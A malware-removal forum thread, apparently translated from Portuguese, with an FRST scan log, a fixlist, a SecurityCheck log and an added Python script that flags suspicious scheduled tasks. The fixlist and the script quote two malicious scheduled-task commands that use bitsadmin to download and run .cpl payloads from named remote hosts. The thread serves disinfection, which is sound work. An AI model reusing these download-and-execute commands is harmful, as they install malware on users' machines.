    CHR Extension: (Google Slides) - C:\Users\A\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-02-03]
    CHR Extension: (Google Docs) - C:\Users\A\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-02-03]
    CHR Extension: (Google Drive) - C:\Users\A\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-10-21]
    CHR Extension: (YouTube) - C:\Users\A\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-09-24]
    CHR Extension: (Google Search) - C:\Users\A\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-10-27]
    CHR Extension: (ZenMate VPN - Best Cyber Security & Unblock) - C:\Users\A\AppData\Local\Google\Chrome\User Data\Default\Extensions\fdcgdnkidjaadafnichfpabhfomcebme [2017-08-04]
    CHR Extension: (Google Sheets) - C:\Users\A\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-02-03]
    CHR Extension: (Google Docs Offline) - C:\Users\A\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-03-15]
    CHR Extension: (Chrome Web Store Payments) - C:\Users\A\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-08-22]
    CHR Extension: (GBBD Caixa Economica Federal) - C:\Users\A\AppData\Local\Google\Chrome\User Data\Default\Extensions\pbcaplhfkihhldmlbjhgajdeghjdbffi [2015-01-24]
    CHR Extension: (Gmail) - C:\Users\A\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-03-27]
    CHR Extension: (Chrome Media Router) - C:\Users\A\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-08-15]
    CHR Extension: (Acrobat PDF Reader) - C:\Users\A\AppData\Roaming\Microsoft\Google [2015-01-28]
    CHR Extension: (Acrobat PDF Reader) - C:\Users\A\AppData\Roaming\Microsoft\Microsoft\Console\Application\Google\Update\0315 [2015-03-15]
    CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - hxxps://clients2.google.com/service/update2/crx
    CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - hxxps://clients2.google.com/service/update2/crx

    ==================== Services (Whitelisted) ====================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    R2 AdobeUpdateService; C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe [771672 2017-03-14] (Adobe Systems Incorporated)
    R2 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [2246256 2017-05-18] (Adobe Systems, Incorporated)
    S2 asComSvc; C:\Program Files (x86)\ASUS\AXSP\1.01.01\atkexComSvc.exe [927232 2012-10-29] ()
    S3 BstHdAndroidSvc; C:\Program Files (x86)\BlueStacks\HD-Service.exe [445976 2016-08-03] (BlueStack Systems, Inc.)
    R2 BstHdLogRotatorSvc; C:\Program Files (x86)\BlueStacks\HD-LogRotatorService.exe [425496 2016-08-03] (BlueStack Systems, Inc.)
    S3 BstHdPlusAndroidSvc; C:\Program Files (x86)\BlueStacks\HD-Plus-Service.exe [462360 2016-08-03] (BlueStack Systems, Inc.)
    R2 Ds3Service; E:\Arquivos de Programas\Scarlet.Crush Productions\bin\ScpService.exe [381952 2014-04-02] (Scarlet.Crush Productions) [File not signed]
    R2 IAStorDataMgrSvc; C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe [16232 2014-04-11] (Intel Corporation)
    R2 Intel(R) Capability Licensing Service Interface; C:\Program Files\Intel\iCLS Client\HeciServer.exe [731648 2013-02-13] (Intel(R) Corporation) [File not signed]
    S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [820184 2013-02-13] (Intel(R) Corporation)
    R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [169432 2013-03-12] (Intel Corporation)
    R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [6058960 2017-08-07] (Malwarebytes)
    R2 MDM; C:\Program Files (x86)\Common Files\Microsoft Shared\VS7DEBUG\mdm.exe [335872 2006-10-26] (Microsoft Corporation) [File not signed]
    S3 NMIndexingService; C:\Program Files (x86)\Common Files\Ahead\Lib\NMIndexingService.exe [279848 2007-06-27] (Nero AG)
    R2 NvContainerLocalSystem; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [495224 2017-06-21] (NVIDIA Corporation)
    S3 NvContainerNetworkService; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [495224 2017-06-21] (NVIDIA Corporation)
    R2 NVDisplay.ContainerLocalSystem; C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe [462968 2017-05-18] (NVIDIA Corporation)
    R2 NvTelemetryContainer; C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe [450168 2017-06-21] (NVIDIA Corporation)
    S3 Origin Client Service; C:\Program Files (x86)\Origin\OriginClientService.exe [2104840 2016-02-22] (Electronic Arts)
    S3 RoxMediaDBGame1X; C:\Program Files (x86)\Common Files\Roxio Shared\Game1X\SharedCOM\RoxMediaDBGame1X.exe [1096424 2014-07-09] (Corel Corporation)
    S3 Te.Service; C:\Program Files (x86)\Windows Kits\10\Testing\Runtimes\TAEF\Wex.Services.exe [137216 2016-03-29] (Microsoft Corporation) [File not signed]
    S3 VsEtwService120; C:\Program Files (x86)\Microsoft Visual Studio 12.0\Common7\Packages\Debugger\Services\VsEtwService.exe [87728 2013-10-04] (Microsoft Corporation)
    S3 VSStandardCollectorService140; E:\Arquivos de Programas\Microsoft Visual Studio 14.0\Team Tools\DiagnosticsHub\Collector\StandardCollector.Service.exe [56552 2016-03-22] (Microsoft Corporation)
    R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation)
    R2 WTabletServiceCon; C:\Program Files\Tablet\Pen\WTabletServiceCon.exe [627992 2014-01-13] (Wacom Technology, Corp.)

    ===================== Drivers (Whitelisted) ======================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    R2 BstHdDrv; C:\Program Files (x86)\BlueStacks\HD-Hypervisor-amd64.sys [152672 2016-08-03] (BlueStack Systems)
    R2 BstkDrv; C:\Program Files (x86)\BlueStacks\BstkDrv.sys [307768 2016-07-28] (Bluestack System Inc. )
    S3 dtlitescsibus; C:\Windows\System32\DRIVERS\dtlitescsibus.sys [30264 2016-01-15] (Disc Soft Ltd)
    S3 dtliteusbbus; C:\Windows\System32\DRIVERS\dtliteusbbus.sys [47672 2016-01-15] (Disc Soft Ltd)
    R1 ESProtectionDriver; C:\Windows\system32\drivers\mbae64.sys [77440 2017-08-24] ()
    S3 H5xUSB; C:\Windows\System32\Drivers\uth5x64.sys [109568 2014-07-24] (UT)
    R0 iaStorF; C:\Windows\System32\drivers\iaStorF.sys [28008 2014-04-11] (Intel Corporation)
    R4 IOMap; C:\Windows\system32\drivers\IOMap64.sys [23680 2013-01-25] (ASUSTeK Computer Inc.)
    R2 MBAMChameleon; C:\Windows\system32\drivers\MBAMChameleon.sys [192960 2017-09-18] (Malwarebytes)
    R3 MBAMFarflt; C:\Windows\System32\DRIVERS\farflt.sys [101824 2017-09-22] (Malwarebytes)
    R3 MBAMProtection; C:\Windows\system32\drivers\mbam.sys [45472 2017-09-22] (Malwarebytes)
    R3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [253888 2017-09-22] (Malwarebytes)
    R3 MBAMWebProtection; C:\Windows\system32\drivers\mwac.sys [84256 2017-09-22] (Malwarebytes)
    R3 MEIx64; C:\Windows\System32\DRIVERS\TeeDriverx64.sys [129312 2014-09-30] (Intel Corporation)
    S3 MotioninJoyXFilter; C:\Windows\System32\DRIVERS\MijXfilt.sys [115272 2015-01-08] (MotioninJoy) [File not signed]
    S3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [30328 2017-06-21] (NVIDIA Corporation)
    R3 nvvad_WaveExtensible; C:\Windows\System32\drivers\nvvad64v.sys [48248 2017-06-21] (NVIDIA Corporation)
    R3 nvvhci; C:\Windows\System32\DRIVERS\nvvhci.sys [57976 2017-05-03] (NVIDIA Corporation)
    R0 PxHlpa64; C:\Windows\System32\Drivers\PxHlpa64.sys [56336 2012-07-10] (Corel Corporation)
    R3 ScpVBus; C:\Windows\System32\DRIVERS\ScpVBus.sys [39168 2013-05-19] (Scarlet.Crush Productions)
    S3 xb1usb; C:\Windows\System32\DRIVERS\xb1usb.sys [42760 2016-02-21] (Microsoft Corporation)
    R2 {B154377D-700F-42cc-9474-23858FBDF4BD}; C:\Program Files (x86)\CyberLink\PowerDVD9\000.fcl [146928 2009-02-28] (CyberLink Corp.)
    S3 catchme; \??\C:\ComboFix\catchme.sys [X]
    S3 X6va017; \??\C:\Windows\SysWOW64\Drivers\X6va017 [X]
    S3 X6va022; \??\C:\Windows\SysWOW64\Drivers\X6va022 [X]

    ==================== NetSvcs (Whitelisted) ===================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


    ==================== One Month Created files and folders ========

    (If an entry is included in the fixlist, the file/folder will be moved.)

    2017-09-22 19:02 - 2017-09-22 19:02 - 000000000 ____D C:\Users\A\Desktop\FRST-OlderVersion
    2017-09-22 19:00 - 2017-09-22 19:00 - 000000000 ___HD C:\Users\Public\Documents\AdobeGC
    2017-09-21 21:07 - 2017-09-21 21:07 - 000000000 ____D C:\Users\A\AppData\Local\Echo
    2017-09-21 19:51 - 2017-09-21 19:51 - 000000202 _____ C:\Users\A\Desktop\ECHO.url
    2017-09-20 20:00 - 2017-09-20 20:00 - 000004222 _____ C:\Users\A\Desktop\rogue2.txt
    2017-09-19 21:44 - 2017-09-19 21:44 - 000000000 ____D C:\Users\A\AppData\Roaming\3909
    2017-09-19 19:37 - 2017-09-19 19:37 - 000007558 _____ C:\Users\A\Desktop\roguekiller.txt
    2017-09-19 19:19 - 2017-09-20 20:38 - 000028272 _____ C:\Windows\system32\Drivers\TrueSight.sys
    2017-09-19 19:17 - 2017-09-19 19:18 - 026696776 _____ C:\Users\A\Desktop\RogueKiller_portable64.exe
    2017-09-18 23:14 - 2017-09-22 19:00 - 000101824 _____ (Malwarebytes) C:\Windows\system32\Drivers\farflt.sys
    2017-09-18 23:14 - 2017-09-18 23:14 - 000001210 _____ C:\Users\A\Desktop\eset.txt
    2017-09-17 23:05 - 2017-09-18 23:39 - 000001504 _____ C:\Users\A\Desktop\mbam2.txt
    2017-09-17 23:01 - 2017-09-17 23:01 - 000022497 _____ C:\Users\A\Desktop\mbam.txt
    2017-09-17 21:24 - 2017-09-22 19:00 - 000253888 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
    2017-09-17 21:24 - 2017-09-22 19:00 - 000084256 _____ (Malwarebytes) C:\Windows\system32\Drivers\mwac.sys
    2017-09-17 21:24 - 2017-09-22 19:00 - 000045472 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbam.sys
    2017-09-17 21:24 - 2017-09-18 23:14 - 000192960 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMChameleon.sys
    2017-09-17 21:24 - 2017-09-17 21:24 - 000001830 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
    2017-09-17 21:24 - 2017-09-17 21:24 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
    2017-09-17 21:23 - 2017-08-24 11:27 - 000077440 _____ C:\Windows\system32\Drivers\mbae64.sys
    2017-09-15 19:08 - 2017-09-15 19:08 - 000010543 _____ C:\Users\A\Desktop\Fixlog.txt
    2017-09-15 19:07 - 2017-09-15 19:07 - 000003443 _____ C:\Users\A\Desktop\fixlist
    2017-09-15 19:06 - 2017-09-22 19:02 - 002399744 _____ (Farbar) C:\Users\A\Desktop\FRST64.exe
    2017-09-15 19:04 - 2017-09-15 19:04 - 000003443 _____ C:\Users\A\fixlist.txt
    2017-09-14 22:00 - 2017-09-14 22:00 - 000000000 ____H C:\Users\A\Documents\Default.rdp
    2017-09-14 21:27 - 2017-09-22 19:03 - 000024175 _____ C:\Users\A\Desktop\FRST.txt
    2017-09-14 21:27 - 2017-09-14 21:27 - 000099260 _____ C:\Users\A\Desktop\Addition.txt
    2017-09-14 21:26 - 2017-09-22 19:03 - 000000000 ____D C:\FRST
    2017-09-13 21:46 - 2017-09-19 19:19 - 000000000 ____D C:\Users\Todos os Usuários\RogueKiller
    2017-09-13 21:46 - 2017-09-19 19:19 - 000000000 ____D C:\ProgramData\RogueKiller
    2017-09-13 21:36 - 2017-09-17 23:15 - 000000000 ____D C:\AdwCleaner
    2017-09-13 20:09 - 2017-09-13 20:09 - 000136984 _____ C:\Users\A\AppData\Local\GDIPFONTCACHEV1.DAT
    2017-09-12 21:00 - 2017-09-12 21:00 - 000000000 ____D C:\Users\Todos os Usuários\Malwarebytes
    2017-09-12 21:00 - 2017-09-12 21:00 - 000000000 ____D C:\ProgramData\Malwarebytes
    2017-09-12 21:00 - 2017-09-12 21:00 - 000000000 ____D C:\Program Files\Malwarebytes
    2017-09-11 22:04 - 2017-09-11 22:04 - 000000397 _____ C:\Users\A\Desktop\Cmd abrindo sozinho.txt
    2017-09-09 15:34 - 2017-09-09 15:34 - 000000202 _____ C:\Users\A\Desktop\Project 1v1 Closed Technical Test.url
    2017-09-09 15:30 - 2017-09-21 21:07 - 000000000 ____D C:\Users\A\AppData\Local\UnrealEngine
    2017-08-31 01:46 - 2017-08-31 01:46 - 000000000 ____D C:\Users\A\AppData\Roaming\Bungie
    2017-08-31 01:16 - 2017-08-31 01:16 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Destiny 2
    2017-08-29 00:06 - 2017-08-29 00:06 - 000000000 ____D C:\Users\A\AppData\Local\id Software
    2017-08-24 01:24 - 2017-08-24 01:24 - 000000336 _____ C:\Users\A\advanced_ip_scanner_MAC.bin
    2017-08-24 01:24 - 2017-08-24 01:24 - 000000015 _____ C:\Users\A\advanced_ip_scanner_Comments.bin
    2017-08-24 01:24 - 2017-08-24 01:24 - 000000015 _____ C:\Users\A\advanced_ip_scanner_Aliases.bin
    2017-08-24 00:06 - 2017-08-24 00:06 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Advanced IP Scanner v2
    2017-08-24 00:06 - 2017-08-24 00:06 - 000000000 ____D C:\Program Files (x86)\Advanced IP Scanner
    2017-08-24 00:03 - 2017-08-24 00:03 - 000000000 ____D C:\Users\A\Documents\Network Monitor 3

    ==================== One Month Modified files and folders ========

    (If an entry is included in the fixlist, the file/folder will be moved.)

    2017-09-22 19:01 - 2014-07-17 17:59 - 000000000 ____D C:\Users\A\AppData\Local\Akamai
    2017-09-22 19:00 - 2014-07-04 07:43 - 000000000 ____D C:\Users\Todos os Usuários\NVIDIA
    2017-09-22 19:00 - 2014-07-04 07:43 - 000000000 ____D C:\ProgramData\NVIDIA
    2017-09-22 19:00 - 2009-07-14 02:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT
    2017-09-21 19:41 - 2017-04-27 20:23 - 000000000 ____D C:\Users\A\AppData\Local\Adobe
    2017-09-21 19:28 - 2009-07-14 01:45 - 000066112 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
    2017-09-21 19:28 - 2009-07-14 01:45 - 000066112 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
    2017-09-21 19:26 - 2011-04-12 10:40 - 000709454 _____ C:\Windows\system32\prfh0416.dat
    2017-09-21 19:26 - 2011-04-12 10:40 - 000148732 _____ C:\Windows\system32\prfc0416.dat
    2017-09-21 19:26 - 2009-07-14 02:13 - 001645972 _____ C:\Windows\system32\PerfStringBackup.INI
    2017-09-21 19:26 - 2009-07-14 00:20 - 000000000 ____D C:\Windows\inf
    2017-09-20 00:15 - 2017-05-07 21:23 - 000000000 ____D C:\Users\A\AppData\Local\CrashDumps
    2017-09-15 19:04 - 2014-07-04 07:44 - 000000000 ____D C:\Users\A
    2017-09-14 23:02 - 2015-02-05 10:23 - 000004384 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater
    2017-09-14 23:02 - 2014-12-10 19:48 - 000803328 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
    2017-09-14 23:02 - 2014-12-10 19:48 - 000144896 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
    2017-09-14 23:02 - 2014-07-02 21:04 - 000000000 ____D C:\Windows\SysWOW64\Macromed
    2017-09-14 23:02 - 2014-07-02 21:04 - 000000000 ____D C:\Windows\system32\Macromed
    2017-09-14 21:51 - 2014-07-02 02:40 - 000000000 ____D C:\Users\A\AppData\Local\NVIDIA Corporation
    2017-09-14 21:51 - 2009-07-14 00:20 - 000000000 ____D C:\Windows\registration
    2017-09-03 21:57 - 2009-07-14 00:20 - 000000000 ____D C:\Windows\system32\NDF
    2017-08-31 22:54 - 2016-12-20 10:47 - 000000000 ____D C:\Users\A\AppData\Local\Battle.net
    2017-08-31 22:53 - 2016-12-20 10:42 - 000000000 ____D C:\Program Files (x86)\Battle.net
    2017-08-31 20:32 - 2017-04-27 21:02 - 000002453 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Acrobat DC.lnk
    2017-08-31 20:32 - 2017-04-27 21:02 - 000002040 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Acrobat Distiller DC.lnk
    2017-08-30 20:58 - 2017-07-01 02:35 - 000000000 ____D C:\Program Files\Rockstar Games
    2017-08-30 20:58 - 2017-07-01 02:35 - 000000000 ____D C:\Program Files (x86)\Rockstar Games
    2017-08-28 20:57 - 2017-07-26 20:37 - 000000000 ____D C:\Users\A\Downloads\PopcornTime
    2017-08-28 20:03 - 2014-12-20 01:55 - 000002402 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk

    ==================== Files in the root of some directories =======

    2015-03-19 19:43 - 2015-03-19 19:43 - 000000092 _____ () C:\Users\A\AppData\Roaming\settings.xml
    2014-12-02 21:13 - 2014-12-02 21:13 - 000017804 _____ () C:\Users\A\AppData\Roaming\unins001.dat
    2017-09-19 08:26 - 2017-09-19 08:26 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BIT22CB.tmp
    2014-12-10 19:31 - 2014-12-10 19:31 - 000000017 _____ () C:\Users\A\AppData\Local\resmon.resmoncfg
    2016-06-02 06:54 - 2016-06-02 06:54 - 000000057 _____ () C:\ProgramData\Ament.ini

    Alguns arquivos em TEMP:
    ====================
    2017-09-19 19:19 - 2013-08-28 23:16 - 001732032 _____ (Microsoft Corporation) C:\Users\A\AppData\Local\Temp\dllnt_dump.dll

    ==================== Bamital & volsnap ======================

    (Não há correção automática para arquivos que não passaram na verificação.)

    C:\Windows\system32\winlogon.exe => O arquivo é assinado digitalmente
    C:\Windows\system32\wininit.exe => O arquivo é assinado digitalmente
    C:\Windows\SysWOW64\wininit.exe => O arquivo é assinado digitalmente
    C:\Windows\explorer.exe => O arquivo é assinado digitalmente
    C:\Windows\SysWOW64\explorer.exe => O arquivo é assinado digitalmente
    C:\Windows\system32\svchost.exe => O arquivo é assinado digitalmente
    C:\Windows\SysWOW64\svchost.exe => O arquivo é assinado digitalmente
    C:\Windows\system32\services.exe => O arquivo é assinado digitalmente
    C:\Windows\system32\User32.dll => O arquivo é assinado digitalmente
    C:\Windows\SysWOW64\User32.dll => O arquivo é assinado digitalmente
    C:\Windows\system32\userinit.exe => O arquivo é assinado digitalmente
    C:\Windows\SysWOW64\userinit.exe => O arquivo é assinado digitalmente
    C:\Windows\system32\rpcss.dll => O arquivo é assinado digitalmente
    C:\Windows\system32\dnsapi.dll => O arquivo é assinado digitalmente
    C:\Windows\SysWOW64\dnsapi.dll => O arquivo é assinado digitalmente
    C:\Windows\system32\Drivers\volsnap.sys => O arquivo é assinado digitalmente

    LastRegBack: 2017-09-20 03:01

    ==================== Fim de FRST.txt ============================

    Addition.txt


    @Murilo Beraldo

    Temporarily disable your antivirus, antispyware and firewall so they do not cause conflicts.

    Open Notepad, copy (Ctrl + C) and paste (Ctrl + V) all of the text in the CODE box below:

    CreateRestorePoint:
    CloseProcesses:
    Task: {7EE04748-D3B9-4738-8B01-EBCA8E40CFF8} - System32\Tasks\NativeUI => cmd /c IF NOT EXIST C:\Users\A\AppData\Roaming\Microsoft\Native.sys (BITSADMIN /Transfer My /Download /Priority HIGH hxxp://www.dicasimpressao.esy.es/FE-1.0.0.0/Control.cpl C:\Users\A\AppData\Roaming\Microsoft\Control.cpl) <==== ATENÇÃO
    Task: {FD79789C-CD4B-4AC8-87B8-00FCDAAD474F} - System32\Tasks\Windows Antivirus Protect => cmd /c bitsadmin /transfer My /Download /Priority HIGH hxxp://www.celgogo.com.br/system/FE-1.0.0.0/antivirusUI.cpl C:\Users\A\AppData\Roaming\Microsoft\AntivirusUI.cpl & C:\Users\A\AppData\Roaming\Microsoft\AntivirusUI.cpl <==== ATENÇÃO
    AlternateDataStreams: C:\ProgramData:961CD860F779A42E [1]
    AlternateDataStreams: C:\Users\All Users:961CD860F779A42E [1]
    AlternateDataStreams: C:\Users\Todos os Usuários:961CD860F779A42E [1]
    AlternateDataStreams: C:\ProgramData\Application Data:961CD860F779A42E [1]
    AlternateDataStreams: C:\ProgramData\Dados de aplicativos:961CD860F779A42E [1]
    AlternateDataStreams: C:\Users\Todos os Usuários\Application Data:961CD860F779A42E [1]
    AlternateDataStreams: C:\Users\Todos os Usuários\Dados de aplicativos:961CD860F779A42E [1]
    CMD: ipconfig /flushdns
    RemoveProxy:
    EmptyTemp:
    CreateRestorePoint:

    Save this file on your Desktop with the name fixlist

    NOTE: It is extremely important that the "fixlist" file is saved on your Desktop. Also check that FRST.exe is on the Desktop.

    ** Windows Vista, Windows 7, 8/8.1 and Windows 10 users:
    Right-click the FRST.EXE file, then click VRIfczU.png.

    Click the Fix button.

    Wait; when it finishes, the Fixlog.txt log will be saved on your desktop.

    Attach the log in your next reply.

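    As an added example (not code from this thread, from FRST or from the helper), the triage step behind a fixlist like the one above in script form: it reads FRST log lines, flags scheduled tasks whose action uses bitsadmin to pull a remote file into the user profile, collects the AlternateDataStreams entries, and emits the matching fixlist entries. The sample lines are constructed from this thread's log, with one hypothetical benign task and a made-up GUID added so the filter has something to leave alone.

```python
import re
from typing import Dict, List

# Constructed sample: the two Task lines and one AlternateDataStreams line from
# this thread's FRST log (FRST defangs URLs as hxxp), plus one hypothetical
# benign task with a made-up GUID so the filter has something to leave alone.
SAMPLE_FRST_LINES = [
    r"Task: {7EE04748-D3B9-4738-8B01-EBCA8E40CFF8} - System32\Tasks\NativeUI => cmd /c IF NOT EXIST C:\Users\A\AppData\Roaming\Microsoft\Native.sys (BITSADMIN /Transfer My /Download /Priority HIGH hxxp://www.dicasimpressao.esy.es/FE-1.0.0.0/Control.cpl C:\Users\A\AppData\Roaming\Microsoft\Control.cpl)",
    r"Task: {FD79789C-CD4B-4AC8-87B8-00FCDAAD474F} - System32\Tasks\Windows Antivirus Protect => cmd /c bitsadmin /transfer My /Download /Priority HIGH hxxp://www.celgogo.com.br/system/FE-1.0.0.0/antivirusUI.cpl C:\Users\A\AppData\Roaming\Microsoft\AntivirusUI.cpl & C:\Users\A\AppData\Roaming\Microsoft\AntivirusUI.cpl",
    r"Task: {00000000-0000-0000-0000-000000000000} - System32\Tasks\HypotheticalUpdater => C:\Program Files\Vendor\Updater.exe [2017-01-01] (Vendor)",
    r"AlternateDataStreams: C:\ProgramData:961CD860F779A42E [1]",
]

TASK_RE = re.compile(r"^Task: (\{[0-9A-Fa-f-]+\}) - (.+?) => (.*)$")
URL_RE = re.compile(r"\bh..ps?://\S+", re.IGNORECASE)  # http(s) and defanged hxxp(s)


def task_indicators(action: str) -> List[str]:
    """Traits that make a scheduled-task action worth a second look."""
    low = action.lower()
    hits = []
    if "bitsadmin" in low and ("/transfer" in low or "/download" in low):
        hits.append("bitsadmin used as a downloader")
    urls = URL_RE.findall(action)
    if urls:
        hits.append("fetches remote file: " + urls[0])
    if re.search(r"\\appdata\\roaming\\.*\.cpl\b", low):
        hits.append("drops/runs a .cpl under AppData\\Roaming")
    return hits


def triage(lines: List[str]) -> Dict[str, list]:
    """Sort FRST lines into flagged tasks, ADS entries and unremarkable tasks."""
    report = {"flagged": [], "ads": [], "clean": []}
    for raw in lines:
        line = raw.strip()
        m = TASK_RE.match(line)
        if m:
            guid, name, action = m.groups()
            why = task_indicators(action)
            if why:
                report["flagged"].append({"guid": guid, "name": name, "why": why, "line": line})
            else:
                report["clean"].append(name)
        elif line.startswith("AlternateDataStreams: "):
            report["ads"].append(line)  # FRST removes an ADS whose log line is in the fixlist
    return report


def build_fixlist(report: Dict[str, list]) -> str:
    """Emit a fixlist in the same shape as the one posted in this thread."""
    entries = ["CreateRestorePoint:", "CloseProcesses:"]
    entries += [t["line"] for t in report["flagged"]]
    entries += report["ads"]
    entries += ["EmptyTemp:"]
    return "\n".join(entries)


if __name__ == "__main__":
    rep = triage(SAMPLE_FRST_LINES)
    for t in rep["flagged"]:
        print(t["name"], "->", "; ".join(t["why"]))
    print(build_fixlist(rep))
```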
  • Topic author
  • EDIT: I had forgotten to disable the antivirus and firewall, here is the new log

    Fixlog.txt

    Edited by Murilo Beraldo


    @Murilo Beraldo

    Press the Windows key + R and type: msconfig

    - Click the Services tab, check Hide all Microsoft services and then click Disable all
    - Click the Startup tab and click Disable all

    Follow the prompts until you are asked to restart.

    After that, let me know whether the malware-related problems still persist.

  • Topic author
  • Well, as far as I can tell, it's solved! I'll test the PC for longer tonight and then give you a definite answer.

    And thank you!

    Edited by Murilo Beraldo


    @Murilo Beraldo

    OK. Waiting.

    In the meantime, run the procedure below.

    Download Security Check by glax24 from one of the links below and save it to your Desktop.
    http://safezone.cc/resources/security-check-by-glax24.25/download?version=631
    Double-click the SecurityCheck.exe file

    1. ** Windows Vista, 7, 8/8.1 and Windows 10 users:
      Right-click the SecurityCheck.exe file, then click VRIfczU.png
    2. Wait while the tool runs its scan;
    3. At the end, save the log as SecurityCheck.html;
    4. Open the file with Notepad;
    5. Select, copy and paste the contents of this log in your next reply.

  • Topic author
  • Here is the log.

    I'm still using the PC to see if anything shows up. Nothing so far :D

    But here are some screenshots of the programs I don't know what they are.

    That PopDeals is obviously something bad XD. It doesn't exist in the indicated location, but it still shows in the list of programs wanting to start with Windows. That's the one I was most worried about.

     

    SecurityCheck by glax24 & Severnyj v.1.4.0.52 [25.07.17]
    WebSite: www.safezone.cc
    DateLog: 25.09.2017 19:40:21
    Path starting: C:\Users\A\AppData\Local\Temp\SecurityCheck\SecurityCheck.exe
    Log directory: C:\SecurityCheck\
    IsAdmin: True
    User: A
    VersionXML: 4.64is-23.09.2017
    ___________________________________________________________________________

    Windows 7(6.1.7601) Service Pack 1 (x64) Professional Lang: Portuguese(0416)
    Installation date OS: 04.07.2014 10:55:35
    LicenseStatus: Windows(R) 7, Professional edition The machine is permanently activated.
    Boot Mode: Normal
    Default Browser: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    SystemDrive: C: FS: [NTFS] Capacity: [111.7 Gb] Used: [78 Gb] Free: [33.7 Gb]
    ------------------------------- [ Windows ] -------------------------------
    Internet Explorer 11.0.9600.17501 Warning! Download Update
    Online installation. Last version available when Windows update is enabled throught the Internet.
    User Account Control enabled
    Notify before download
    Date install updates: 2015-01-28 05:33:05
    Windows Update (wuauserv) - The service is running
    Central de Segurança (wscsvc) - The service is running
    Registro remoto (RemoteRegistry) - The service has stopped
    Descoberta SSDP (SSDPSRV) - The service is running
    Serviços de Área de Trabalho Remota (TermService) - The service has stopped
    Windows Remote Management (WS-Management) (WinRM) - The service has stopped
    ------------------------------ [ MS Office ] ------------------------------
    Microsoft Office 2007 v.12.0.4518.1014
    ---------------------------- [ Antivirus_WMI ] ----------------------------
    Malwarebytes (disabled and up to date)
    --------------------------- [ FirewallWindows ] ---------------------------
    Firewall do Windows (MpsSvc) - The service is running
    --------------------------- [ AntiSpyware_WMI ] ---------------------------
    Malwarebytes (disabled and up to date)
    Windows Defender (enabled and up to date)
    ---------------------- [ AntiVirusFirewallInstall ] -----------------------
    ESET Online Scanner v3
    -------------------------- [ SecurityUtilities ] --------------------------
    Malwarebytes versão 3.2.2.2029 v.3.2.2.2029
    --------------------------- [ OtherUtilities ] ----------------------------
    WinRAR 5.01 (64-bit) v.5.01.0 Warning! Download Update
    Microsoft Silverlight v.5.1.30514.0 Warning! Download Update
    VLC media player v.2.1.5 Warning! Download Update
    --------------------------------- [ IM ] ----------------------------------
    Skype™ 7.30 v.7.30.105 Warning! Download Update
    -------------------------------- [ Java ] ---------------------------------
    Java 8 Update 31 v.8.0.310 Warning! Download Update
    Uninstall old version and install new one (jre-8u144-windows-i586.exe).
